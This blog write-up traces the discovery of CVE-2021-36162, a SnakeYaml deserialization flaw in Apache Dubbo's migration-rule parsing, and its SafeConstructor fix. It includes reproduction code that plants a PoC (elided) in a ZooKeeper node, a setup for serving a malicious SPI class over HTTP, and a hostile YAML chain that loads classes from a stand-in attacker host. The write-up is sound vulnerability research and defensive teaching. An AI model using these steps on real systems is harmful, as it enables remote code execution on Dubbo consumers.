Apache Dubbo CVE-2021-36162 mining process

## 01 Vulnerability Background

This vulnerability turned up while I was analysing the script-injection patch for CVE-2021-30181: I noticed several yaml deserialization fixes and at first took them for an undisclosed Nday. On checking, they turned out to be the fix for CVE-2021-30180. The patch shows that every yaml.load call in the Router module was switched to the SafeConstructor whitelist, so those call sites can no longer be exploited.

(For background on SnakeYaml deserialization, see the earlier post on the official account, "Java SnakeYaml deserialization analysis".)


Searching the code for other calls to yaml.load shows one more module that calls it without the SafeConstructor hardening. The vulnerable code is in MigrationRule:

```java
public class MigrationRule {
    private static final String DUBBO_SERVICEDISCOVERY_MIGRATION_KEY = "dubbo.application.service-discovery.migration";
    public static final String DUBBO_SERVICEDISCOVERY_MIGRATION_GROUP = "MIGRATION";
    public static final String RULE_KEY = ApplicationModel.getName() + ".migration";
    private static DynamicConfiguration configuration = null;
    private String key;
    private MigrationStep step;
    ...

    public static MigrationRule parse(String rawRule) {
        if (null == configuration) {
            return getMigrationRule((String) null);
        } else if (!StringUtils.isBlank(rawRule) && !"INIT".equals(rawRule)) {
            // Vulnerable: a full Constructor honours explicit !!tags in the rule text,
            // so attacker-controlled YAML from the config center can instantiate
            // arbitrary classes instead of a MigrationRule.
            Constructor constructor = new Constructor(MigrationRule.class);
            Yaml yaml = new Yaml(constructor);
            return (MigrationRule) yaml.load(rawRule);
        } else {
            String step = (String) configuration.getInternalProperty("dubbo.application.service-discovery.migration");
            return getMigrationRule(step);
        }
    }
    ...
}
```

So the PoC for CVE-2021-30180 also works here. The concrete deserialization exploit chain was published by GitHub Security Lab; interested readers can refer to it and adapt it to CVE-2021-36162.

## 02 Vulnerability trigger

With a yaml deserialization exploit chain in hand, the next step is to find out how to reach the vulnerable code. Following the trigger method of the previous vulnerability, the trigger is completed by adding a node to ZooKeeper (ZK below) that holds the malicious data, so two problems must be solved:

1. In which node of ZK add malicious yaml data?

2. How to let consumers read and parse this yaml data?

Question one

Searching for the Migration feature turns up the following documentation. Dubbo uses it to control how consumers select addresses (the address-migration strategy). From the description it can be determined that the rule data is delivered through the global configuration center, i.e. ZK, so the malicious data can be placed there.


Run the consumer and provider normally and capture the traffic: the ZK paths related to migration are visible in it. Create the corresponding node and insert arbitrary data at that path (the migration-rule node used by the insertion code below).

Question two

After inserting the arbitrary data, run the consumer again: it now logs a yaml parsing exception, which proves that the inserted data took effect and reached the vulnerable code.


Next, insert the constructed PoC at that path. The PoC contains many spaces and special characters, and inserting it directly through zkCli.sh causes various problems, so the vulnerability does not trigger reliably. Instead, write the data to ZK from Java using a third-party client library (Apache Curator). The code is as follows:

Use the following code to insert the malicious yaml data (insertion logic I wrote before seeing the insertion code in the official GitHub PoC):

```java
import org.apache.curator.RetryPolicy;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.curator.retry.ExponentialBackoffRetry;
import org.apache.zookeeper.data.Stat;

public class RegisterYaml {
    public static void main(String[] args) throws Exception {
        // Migration-rule node read by the consumer application "consumer-of-helloworld-app"
        String path = "/dubbo/config/MIGRATION/consumer-of-helloworld-app.migration";
        // The yaml PoC payload (elided in the original post)
        String poc = "...";
        RetryPolicy retryPolicy = new ExponentialBackoffRetry(1000, 3);
        CuratorFramework client = CuratorFrameworkFactory.newClient("127.0.0.1:2181", retryPolicy);
        client.start();
        // Remove any existing node so the consumer reads exactly our data
        Stat stat = client.checkExists().forPath(path);
        if (stat != null) {
            client.delete().forPath(path);
        }
        client.create().forPath(path, poc.getBytes());
        client.close();
    }
}
```

Also prepare the SPI configuration file the chain needs and the class file whose code is to be executed. The directory layout is as follows:

```
├── META-INF
│   └── services
│       └── javax.script.ScriptEngineFactory
└── cc
    └── m01n
        └── SnakeYaml
            └── AwesomeScriptEngineFactory.class
```

Start an HTTP server with Python in the directory that contains META-INF:

```shell
python3 -m http.server 8000
```

Start the provider first, then run the consumer to trigger the vulnerability.


## 03 Vulnerability Analysis

Set a breakpoint in the MigrationRuleListener class: it calls this.configuration.getConfig to fetch the yaml data from ZK into rawRule, and the malicious yaml we wrote can be seen being read out.


Following further, the MigrationRuleListener instance is created through Dubbo's own SPI mechanism, ExtensionLoader#createExtension.


Afterwards onRefer is called on the MigrationRuleListener instance, which triggers the subsequent yaml parsing.

Stepping in from the breakpoint shows the yaml in rawRule being passed to yaml.load, which is where the deserialization happens.


## 04 Bug fixes

This vulnerability was fixed in version 2.7.13, in the same way as CVE-2021-30180: the parse now uses SafeConstructor. The fix commit:

https://github.com/apache/dubbo/commit/bfa4b3bb6660d404c0715f54f8743dda45b46909
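To make the difference between the vulnerable parse in section 01 and the SafeConstructor fix concrete, here is an added, self-contained example. It is not Dubbo's code and not the actual patch: a hypothetical two-field Rule class stands in for MigrationRule, the hostile document is constructed to have the shape of the ScriptEngineManager chain with a placeholder URL, and SnakeYAML 1.x is assumed.

```java
import java.util.Map;

import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class MigrationRuleParseDemo {

    // Hypothetical stand-in for Dubbo's MigrationRule: only the two fields used here.
    public static class Rule {
        public String key;
        public String step;
    }

    // Shape of the vulnerable code (MigrationRule.parse before 2.7.13).
    // Constructor(Rule.class) only sets the *default* root type; an explicit
    // !!tag in the document still wins, so any class on the classpath with a
    // matching constructor can be instantiated from attacker-controlled YAML.
    public static Object parseUnsafe(String rawRule) {
        Yaml yaml = new Yaml(new Constructor(Rule.class));
        return yaml.load(rawRule);
    }

    // Hardened shape, following the SafeConstructor approach of the fix:
    // SafeConstructor builds only standard YAML types (maps, lists, scalars)
    // and throws on unknown tags, so the rule is read as a Map and the fields
    // are copied into the bean by hand.
    public static Rule parseSafe(String rawRule) {
        Yaml yaml = new Yaml(new SafeConstructor());
        Object loaded = yaml.load(rawRule);
        if (!(loaded instanceof Map)) {
            throw new IllegalArgumentException("migration rule must be a YAML mapping");
        }
        Map<?, ?> map = (Map<?, ?>) loaded;
        Rule rule = new Rule();
        rule.key = asString(map.get("key"));
        rule.step = asString(map.get("step"));
        return rule;
    }

    private static String asString(Object value) {
        return value == null ? null : String.valueOf(value);
    }

    public static void main(String[] args) {
        // Constructed benign rule, the kind of document the node normally holds.
        String benign = "key: consumer-of-helloworld-app\nstep: FORCE_APPLICATION\n";

        // Constructed document with the shape of the ScriptEngineManager chain
        // (a URLClassLoader pointing at a remote SPI jar). The URL is a placeholder.
        String hostile = "!!javax.script.ScriptEngineManager ["
                + "!!java.net.URLClassLoader [[!!java.net.URL [\"http://attacker.invalid/\"]]]]";

        Rule ok = parseSafe(benign);
        System.out.println("safe parse: key=" + ok.key + " step=" + ok.step);

        try {
            parseSafe(hostile);
            System.out.println("hostile document was accepted (unexpected)");
        } catch (YAMLException e) {
            // SafeConstructor rejects the unknown tag with a ConstructorException
            // ("could not determine a constructor for the tag ...").
            System.out.println("hostile document rejected: " + e.getMessage());
        }

        // parseUnsafe(hostile) is deliberately never called: with the full
        // Constructor it would instantiate ScriptEngineManager and load classes
        // from the remote URL. The benign document shows the unsafe path works
        // for ordinary rules, which is why the bug went unnoticed.
        Rule viaUnsafe = (Rule) parseUnsafe(benign);
        System.out.println("unsafe parse of benign document: step=" + viaUnsafe.step);
    }
}
```

The point of the Map-then-copy pattern is that the class to instantiate is fixed by the code, not by the document: the only things SafeConstructor will ever build are standard YAML types, so a `!!`-tagged node fails at parse time instead of running a constructor.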



Origin blog.csdn.net/weixin_53312997/article/details/131941284